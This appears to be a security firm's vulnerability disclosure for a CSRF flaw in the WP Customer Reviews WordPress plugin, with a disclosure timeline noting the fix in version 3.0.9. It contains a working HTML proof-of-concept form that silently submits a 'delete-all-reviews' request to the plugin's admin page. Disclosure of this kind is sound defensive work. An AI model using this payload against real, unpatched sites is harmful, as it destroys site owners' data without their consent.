06 Apr

Cross-Site Request Forgery (CSRF) Vulnerability in WP Customer Reviews

We recently discovered the WP Customer Reviews plugin had a cross-site request forgery (CSRF) vulnerability. In version 3.0.8, and some prior versions, the plugin did not insure that actions, including deleting the all of the reviews created in the plugin, were actually made by the requested user with a nonce.

Proof Of Concept

The following proof of concept will delete all of the plugin’s reviews.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<head>
</head>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=wpcr3_options&tab=tools" method="post">
<input type="hidden" name="wpcr3_debug_code" value="delete-all-reviews" />
<input type="hidden" name="wpcr3_confirm" value="YES" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 4/4/2016 – Developer notified.
  • 4/5/2016 – Version 3.0.9 released, which fixes vulnerability.

Concerned About The Security of The Plugins You Use

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.

Leave a Reply

Your email address will not be published. Required fields are marked *